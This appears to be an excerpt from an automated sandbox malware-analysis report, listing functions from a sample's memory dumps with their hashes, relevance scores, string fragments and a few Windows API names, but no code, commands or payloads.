                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_5020000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: <`,$T
                                                                                            • API String ID: 0-896310870
                                                                                            • Opcode ID: 7f1c85b59b1bda381f1cc2f10b35533dd4238f3480fa41b1f9d8088ba1bef6bf
                                                                                            • Instruction ID: d5794ddacaf83bbc853312efff025c50f30acabac91149676344378f6380ccdd
                                                                                            • Opcode Fuzzy Hash: 7f1c85b59b1bda381f1cc2f10b35533dd4238f3480fa41b1f9d8088ba1bef6bf
                                                                                            • Instruction Fuzzy Hash: 0E41E374A08229CFCB64DF68D958AADB7F1FF49300F0044EAE959A7291C7746E848F15
                                                                                            Function 0064BBA4 Relevance: 2.6, Strings: 2, Instructions: 54COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: +$/
                                                                                            • API String ID: 0-2439032044
                                                                                            • Opcode ID: feee843a6a520fec16b84530506aeb893ab1feaf0b03224ee177d46a10ebb856
                                                                                            • Instruction ID: fbae57138525613f10de0727471adc2426f0c3a36bb162a9e322048f036d1207
                                                                                            • Opcode Fuzzy Hash: feee843a6a520fec16b84530506aeb893ab1feaf0b03224ee177d46a10ebb856
                                                                                            • Instruction Fuzzy Hash: 2B21343590129ADBCB20DF58D844BDCB7B1FB4A305F0081EAE90DB3210C774AA86CF44
                                                                                            Function 00D2433B Relevance: 2.5, Strings: 2, Instructions: 47COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0,$"
                                                                                            • API String ID: 0-3793174398
                                                                                            • Opcode ID: 0e8d01cfdd927a268b4cc7970d2b6bd28eb7cad68803960b1c06873378f2c60e
                                                                                            • Instruction ID: 492eb24b93f784cdf2f2db3ffe6ba8e2c1df1ae7cb0c2a64e13fd42b00babfbb
                                                                                            • Opcode Fuzzy Hash: 0e8d01cfdd927a268b4cc7970d2b6bd28eb7cad68803960b1c06873378f2c60e
                                                                                            • Instruction Fuzzy Hash: 0A21B274A012288FDB61DF28E858BDABBF1BF4A300F5045E9E50EA7260DB305E80CF51
                                                                                            Function 00A93369 Relevance: 2.5, Strings: 2, Instructions: 27COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: O$O
                                                                                            • API String ID: 0-2467081800
                                                                                            • Opcode ID: d841508471476abf6394e631a7d9f48f62b0bdbfe156a90d657cadbb434efe20
                                                                                            • Instruction ID: 387de835781f5fd52c6ac0fb793679cdd1207436c9c6b21dfdfa99bdaab5f82e
                                                                                            • Opcode Fuzzy Hash: d841508471476abf6394e631a7d9f48f62b0bdbfe156a90d657cadbb434efe20
                                                                                            • Instruction Fuzzy Hash: FCF01C74E05208EFCB40DFA8D5556ADBBF4EB48300F10C1E98C1997341EA35AE02DF85
                                                                                            Function 04A7DD40 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualProtect.KERNELBASE(?,?,?,?), ref: 04A7DDE4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492334171.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_4a70000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID: ProtectVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 544645111-0
                                                                                            • Opcode ID: 305b12fa2c9a5c28c65bcc035da438526228382d5b739593bb581d4cbbb54571
                                                                                            • Instruction ID: 80dec76dbbbf63ff7723a199b045f65c5f692a2eec70bd1cddd678cc7da55064
                                                                                            • Opcode Fuzzy Hash: 305b12fa2c9a5c28c65bcc035da438526228382d5b739593bb581d4cbbb54571
                                                                                            • Instruction Fuzzy Hash: 663197B8D012189FDF14CFA9D984AEEFBB5BF49310F24942AE814BB210D735A945CF94
                                                                                            Function 00AAF710 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488900818.0000000000AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AA0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_aa0000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID: Sleep
                                                                                            • String ID:
                                                                                            • API String ID: 3472027048-0
                                                                                            • Opcode ID: 6ccf93fa8d8e4ac7e395e1884086eba1555514f835df53d27a9603755f45e4aa
                                                                                            • Instruction ID: 827169ff06d59c0046a221a09f9864368ea62e2c94afff67575ed7f89bb606a1
                                                                                            • Opcode Fuzzy Hash: 6ccf93fa8d8e4ac7e395e1884086eba1555514f835df53d27a9603755f45e4aa
                                                                                            • Instruction Fuzzy Hash: 9F31DBB5D012189FDF14CFA9D984AEEFBF5AF49310F24942AE804B7250C735A945CFA4
                                                                                            Function 00614288 Relevance: 1.5, APIs: 1, Instructions: 35libraryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • LdrInitializeThunk.NTDLL(70D67560,00000001,00000000,00000000), ref: 006142BD
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488752664.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_610000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID: InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 2994545307-0
                                                                                            • Opcode ID: 97226bdb261210fbd32edc7eca0350cf22434356998fac8c1c1ae92a7c6f69b3
                                                                                            • Instruction ID: cff2cc817371e1dc8808d07ff4ea5d601c32bd4014eefbecc3265b993a4dd2df
                                                                                            • Opcode Fuzzy Hash: 97226bdb261210fbd32edc7eca0350cf22434356998fac8c1c1ae92a7c6f69b3
                                                                                            • Instruction Fuzzy Hash: B7F0906015A3D45FE31297614C6DFDA3F749B43310F2880DAE0448B5E3C6785889C772
                                                                                            Function 00A9FA2B Relevance: 1.5, Strings: 1, Instructions: 233COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: |*6
                                                                                            • API String ID: 0-2560423571
                                                                                            • Opcode ID: 4eae18a81895ee321a4106f8f14269ad13a3f190de36716ff51290bd207e3cc9
                                                                                            • Instruction ID: 4e05ebcc6ae6ea8dc5785d6fffd66cea3b5f261199a9cf3b75f1949cb1200cfc
                                                                                            • Opcode Fuzzy Hash: 4eae18a81895ee321a4106f8f14269ad13a3f190de36716ff51290bd207e3cc9
                                                                                            • Instruction Fuzzy Hash: 56B12874F04258CFDF64DFA4E894BADBBF2EB49304F1080A9E419AB295CB745A85CF11
                                                                                            Function 00A92BF8 Relevance: 1.4, Strings: 1, Instructions: 167COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: TJ"p
                                                                                            • API String ID: 0-4019288291
                                                                                            • Opcode ID: 37ede287a25105e6bdd5b5645ccf55e3994bd3bfd1a8cc6304e12e6f50d7e953
                                                                                            • Instruction ID: d4559c3ea8722530edeba639194103df2cd79fc45c31e14c5dfc61d9fbc0557e
                                                                                            • Opcode Fuzzy Hash: 37ede287a25105e6bdd5b5645ccf55e3994bd3bfd1a8cc6304e12e6f50d7e953
                                                                                            • Instruction Fuzzy Hash: AB71D974E04248DFDB04EFA8E5986AEBBF2FB99300F208069E415B7398DB785945CF51
                                                                                            Function 00A92C08 Relevance: 1.4, Strings: 1, Instructions: 164COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: TJ"p
                                                                                            • API String ID: 0-4019288291
                                                                                            • Opcode ID: 95ce4c60fc7f7313968c925a03f54d7d868477882e9973aeb0dbeb9cdd9c66f3
                                                                                            • Instruction ID: 33360abb45737c60232730a1acbd24eaa1c562e66b737544495f71d2c0ab59c7
                                                                                            • Opcode Fuzzy Hash: 95ce4c60fc7f7313968c925a03f54d7d868477882e9973aeb0dbeb9cdd9c66f3
                                                                                            • Instruction Fuzzy Hash: 6471D874E04248DFDB04EFA8E5986AEBBF2FB99300F208069E415B7398DB745945CF51
                                                                                            Function 00D2B910 Relevance: 1.4, Strings: 1, Instructions: 157COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,!p
                                                                                            • API String ID: 0-1059414960
                                                                                            • Opcode ID: 3001c694b831265dc3e2b9d0841a9fe5bd8846cc9f23ff31c870ac67d74879cf
                                                                                            • Instruction ID: 99297e4b38754218fa43eed63530290278516e6753bbdf0d72ea1f1c6dac608f
                                                                                            • Opcode Fuzzy Hash: 3001c694b831265dc3e2b9d0841a9fe5bd8846cc9f23ff31c870ac67d74879cf
                                                                                            • Instruction Fuzzy Hash: 4251C3357002108FDB14DF69D890A5EBBF2FF89311B15816AEA05CB362CB71EC01CBA1
                                                                                            Function 00D2AA30 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: (!p
                                                                                            • API String ID: 0-2763268518
                                                                                            • Opcode ID: 2c0ff86611b3b707cd19b7e8f1a08153c55c532346a17bbb293c72a9468664e0
                                                                                            • Instruction ID: 976cbd3cb86f90e7788b2807b3cd6212aa307515a994d7df55ce96d671762393
                                                                                            • Opcode Fuzzy Hash: 2c0ff86611b3b707cd19b7e8f1a08153c55c532346a17bbb293c72a9468664e0
                                                                                            • Instruction Fuzzy Hash: D4512731A006268FC700CF58D890A6AFBB2FF95314B1986AAE5199B351D730FC52CBE1
                                                                                            Function 00D29A70 Relevance: 1.4, Strings: 1, Instructions: 151COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: p!p
                                                                                            • API String ID: 0-1147775804
                                                                                            • Opcode ID: afd5720ae7c9b997f057684c33a0f08f7f32064796131127f2d5dbc74df52fc7
                                                                                            • Instruction ID: 3f6b3c2ee35be60a58e90ea282e89df4c5b5a809197d65cea9a783e3d3c04942
                                                                                            • Opcode Fuzzy Hash: afd5720ae7c9b997f057684c33a0f08f7f32064796131127f2d5dbc74df52fc7
                                                                                            • Instruction Fuzzy Hash: 3E512C76610110AFCB459FA8D815D69BBB3FF9931471A80A8F6099B372CB32DC21EB50
                                                                                            Function 00A9D240 Relevance: 1.4, Strings: 1, Instructions: 115COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: oOI
                                                                                            • API String ID: 0-15478488
                                                                                            • Opcode ID: 5970615eb4df8ed984721251ceb141433960382ef8281afc2238a796b3dbb1ee
                                                                                            • Instruction ID: ceca3aebd632efdf138b6fd1349825e07fd84b2921a06c65f2e944a72a96d53b
                                                                                            • Opcode Fuzzy Hash: 5970615eb4df8ed984721251ceb141433960382ef8281afc2238a796b3dbb1ee
                                                                                            • Instruction Fuzzy Hash: 5651B570E01208DFDF18DFAAD595AADBBF2BF89301F20812AE415AB351DB359981CF50
                                                                                            Function 04A7EF08 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 04A7EFA7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492334171.0000000004A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 04A70000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_4a70000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: e2159b67d93e8d8ca654377dd3c6b40c91e9f71a4d6f459e9f782c4b0c499204
                                                                                            • Instruction ID: e259c3d9b12122b38d3bb182318436183df5068ff719c6fe8c38c9fd12a8cd06
                                                                                            • Opcode Fuzzy Hash: e2159b67d93e8d8ca654377dd3c6b40c91e9f71a4d6f459e9f782c4b0c499204
                                                                                            • Instruction Fuzzy Hash: 663199B5D01258DFDF14CFA9E884ADEFBB1AF49310F24942AE814BB210D735A945CF94
                                                                                            Function 0064EB70 Relevance: 1.3, Strings: 1, Instructions: 72COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ILuV
                                                                                            • API String ID: 0-1855505789
                                                                                            • Opcode ID: 6e5a0bcd56f3844668fbcc10936d6a3fd3a1ce3d158ec85c888bc76ef14be56c
                                                                                            • Instruction ID: afb702a653bcbbd9ae364b5df6b64d37202a3fd4285199b24092ef83fb417fec
                                                                                            • Opcode Fuzzy Hash: 6e5a0bcd56f3844668fbcc10936d6a3fd3a1ce3d158ec85c888bc76ef14be56c
                                                                                            • Instruction Fuzzy Hash: 4B219D74E04209CFDB04DFAAD950AAEB7F2FB89300F20C4A5D41AA7354D7359942CF50
                                                                                            Function 05020445 Relevance: 1.3, Strings: 1, Instructions: 35COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492552102.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_5020000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 5
                                                                                            • API String ID: 0-2226203566
                                                                                            • Opcode ID: d4a54c455ad8f2455532317c043a3d14c551b81bf736d05f3986239be56af76e
                                                                                            • Instruction ID: 3095e9192da33f2e227725dc348786148a016c220b879d34a9d05358fa8b90a5
                                                                                            • Opcode Fuzzy Hash: d4a54c455ad8f2455532317c043a3d14c551b81bf736d05f3986239be56af76e
                                                                                            • Instruction Fuzzy Hash: 4B11D378A052288FCB65EF18D944A99B7F1FB8A300F1480E9E849B7744CB346F80CF51
                                                                                            Function 00A96E8E Relevance: 1.3, Strings: 1, Instructions: 32COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H
                                                                                            • API String ID: 0-2852464175
                                                                                            • Opcode ID: 38e0da4bd41a22f78b7dbee6de35385ca048aa49986b9a4f7feb66cda0b78e49
                                                                                            • Instruction ID: e59d7d9fa99ececde2be79c97a4cce0f5ef90c8c9910850eb396e38c0bb8c871
                                                                                            • Opcode Fuzzy Hash: 38e0da4bd41a22f78b7dbee6de35385ca048aa49986b9a4f7feb66cda0b78e49
                                                                                            • Instruction Fuzzy Hash: 5601E4B4E48219CBDF20CF64C888BEDBAF0BF19355F6011AAC41976240DBB80AC4CF58
                                                                                            Function 05020EA3 Relevance: 1.3, Strings: 1, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.492552102.0000000005020000.00000040.00000800.00020000.00000000.sdmp, Offset: 05020000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_5020000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 6
                                                                                            • API String ID: 0-498629140
                                                                                            • Opcode ID: 5521744f4f79ce4db19e806d771231d62b7b3298205b9e5c31d93b32323f1f66
                                                                                            • Instruction ID: cb8aa0ce88247e8df0bfd30263aa66f348a4df125c376adea5f9d16e3d4ac085
                                                                                            • Opcode Fuzzy Hash: 5521744f4f79ce4db19e806d771231d62b7b3298205b9e5c31d93b32323f1f66
                                                                                            • Instruction Fuzzy Hash: 4DF01D746081248FD766EF68D858A9AB7B6EB89304F0080D9A51DA7394CB38AE818F10
                                                                                            Function 00D235B6 Relevance: 1.3, Strings: 1, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: j
                                                                                            • API String ID: 0-2137352139
                                                                                            • Opcode ID: f50101e5964e248b81085e65f5273b93d5c3d126b0f0e243462eaf5f8b2e6a9f
                                                                                            • Instruction ID: 2538022a77d4a68d8eb9fb162cffcbd4e9a6ec00626195de35f934be26e61587
                                                                                            • Opcode Fuzzy Hash: f50101e5964e248b81085e65f5273b93d5c3d126b0f0e243462eaf5f8b2e6a9f
                                                                                            • Instruction Fuzzy Hash: F0E0D870A083688FDB21DF54E844B9D7FF17B24304F104594C009AB355D7B89A448F51
                                                                                            Function 00A92F28 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,
                                                                                            • API String ID: 0-1222783184
                                                                                            • Opcode ID: 3be4ca778e942dae62c87401bd52e9210cb6d77d2c96563183aeaaa56f98e68b
                                                                                            • Instruction ID: 1bd959f25bbcc258dff3ebecd55411cbbe87db9c9a13177ee0a5886d391168f3
                                                                                            • Opcode Fuzzy Hash: 3be4ca778e942dae62c87401bd52e9210cb6d77d2c96563183aeaaa56f98e68b
                                                                                            • Instruction Fuzzy Hash: 76E0127191524CEBDB10FFB18914B5E77A8EB02304F1042F5D50593150DE355A149B91
                                                                                            Function 0020CA88 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488319438.0000000000200000.00000040.00000800.00020000.00000000.sdmp, Offset: 00200000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_200000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: ,z4
                                                                                            • API String ID: 0-980550495
                                                                                            • Opcode ID: 2d73fe5df55ce43eef5dd4e737bc0518fd38c49f92ba4a9689325d8eae492956
                                                                                            • Instruction ID: 14726cc3891cbdf7fe3a8f66218b5d28dd9831ffef75f689e7922910cbe9fe5f
                                                                                            • Opcode Fuzzy Hash: 2d73fe5df55ce43eef5dd4e737bc0518fd38c49f92ba4a9689325d8eae492956
                                                                                            • Instruction Fuzzy Hash: 10E08270905208EFD700EFB09D18A8E7BA8EB06204F1001A6D008D3260EF321A188B92
                                                                                            Function 00A97B0A Relevance: 1.3, Strings: 1, Instructions: 16COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: \
                                                                                            • API String ID: 0-2967466578
                                                                                            • Opcode ID: 416ee7d81db3419fc26845b519662fe4065510f87679aaa8b9f380ea0ce9c8ec
                                                                                            • Instruction ID: d07d401a86c53a91832877dda8f90e1387fd1a56676c0296e320e574bf52cb2f
                                                                                            • Opcode Fuzzy Hash: 416ee7d81db3419fc26845b519662fe4065510f87679aaa8b9f380ea0ce9c8ec
                                                                                            • Instruction Fuzzy Hash: C6E07E74A15219CBDF21CF50D888BEEBBF1AB09305F24A09A880972290D6740A84EF29
                                                                                            Function 00D2E5F0 Relevance: .5, Instructions: 521COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 49d1e613e255a81511902327d948a314b6e9b64e1cef85bc09862441c9da80ec
                                                                                            • Instruction ID: 7c6bb23ec2f4958d287d828cd2ab85bb37a16ba35dd44d39fb8c651a8fa4bcd0
                                                                                            • Opcode Fuzzy Hash: 49d1e613e255a81511902327d948a314b6e9b64e1cef85bc09862441c9da80ec
                                                                                            • Instruction Fuzzy Hash: C222A130E006299FCF15DFA4E844AADBBB2FF68314F188555E812A73A4DB749E41CF60
                                                                                            Function 00A9EAB8 Relevance: .4, Instructions: 370COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488883436.0000000000A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A90000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_a90000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 553727a0132942217074dc58e853af4d43f13d1c7a08c843a00e4e8fd3219da8
                                                                                            • Instruction ID: 8922102b82d632b3213465901ad95866578ce5738f76d45fc4bd80982293226c
                                                                                            • Opcode Fuzzy Hash: 553727a0132942217074dc58e853af4d43f13d1c7a08c843a00e4e8fd3219da8
                                                                                            • Instruction Fuzzy Hash: DFF1B734B10118DFDB08DFA4D999A9DBBB2FF89300F518159E506AB3A6DB71EC42CB50
                                                                                            Function 00D2F958 Relevance: .3, Instructions: 323COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488949293.0000000000D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D20000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_d20000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6c5329bd6ac2a8667a21fee42c9ac3aecc57c3d45f96c460ca48e2ac5e2f4f94
                                                                                            • Instruction ID: a3b09b4555e1456aaa71eed39c545895cddc8dd24dcfab4a7c1962660c4e0864
                                                                                            • Opcode Fuzzy Hash: 6c5329bd6ac2a8667a21fee42c9ac3aecc57c3d45f96c460ca48e2ac5e2f4f94
                                                                                            • Instruction Fuzzy Hash: 10C14670B002148FDB04DF69D894AAEBBF6AF99304F1484B9E505DB3A5DB70EC41CBA1
                                                                                            Function 006499A8 Relevance: .3, Instructions: 317COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 37ba05c022109babac7dac47b44d044842a6a297fac5def440d0e6e8f3570751
                                                                                            • Instruction ID: 75ca3fe93c82ae8d73cdeb87560b5629daa440b4fe0ea6d2b992ee02ea3d1598
                                                                                            • Opcode Fuzzy Hash: 37ba05c022109babac7dac47b44d044842a6a297fac5def440d0e6e8f3570751
                                                                                            • Instruction Fuzzy Hash: 5EE11874A05218CFDB24EF65E954BADBBB2FB9A300F1080A9E009A7394DB745D85CF11
                                                                                            Function 00649AD0 Relevance: .3, Instructions: 292COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 08fe975f90d0a751603dec4f6e06954f6ba559e26b7c81966268ce577062fcb5
                                                                                            • Instruction ID: ca8818b8d38500af668bf4dc1fc98bc10c35dda571b1c75f7d0b2f28eda52ec1
                                                                                            • Opcode Fuzzy Hash: 08fe975f90d0a751603dec4f6e06954f6ba559e26b7c81966268ce577062fcb5
                                                                                            • Instruction Fuzzy Hash: B3D10874A05218CFDB64EF65E994BAEB7B2FB9A300F1080A9E009B7394DB745D85CF11
                                                                                            Function 00649B91 Relevance: .3, Instructions: 279COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000005.00000002.488778623.0000000000640000.00000040.00000800.00020000.00000000.sdmp, Offset: 00640000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_5_2_640000_tmp7752.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 147748d99adfd7f90f88b485fdf81b97631f8e266a1bdaf97a6829e5260dcf70
                                                                                            • Instruction ID: 0e6e19d17060e2cc4e847cf2a85045b912576db69b27b18bb17cfc37b9bf65a2
                                                                                            • Opcode Fuzzy Hash: 147748d99adfd7f90f88b485fdf81b97631f8e266a1bdaf97a6829e5260dcf70
                                                                                            • Instruction Fuzzy Hash: 88D13B78A05218CFDB24EF64E994BADB7B2FB9A300F1080A9E009B7395DB745D85CF11
                                                                                            Function 0064A49D Relevance: .3, Instructions: 261COMMON
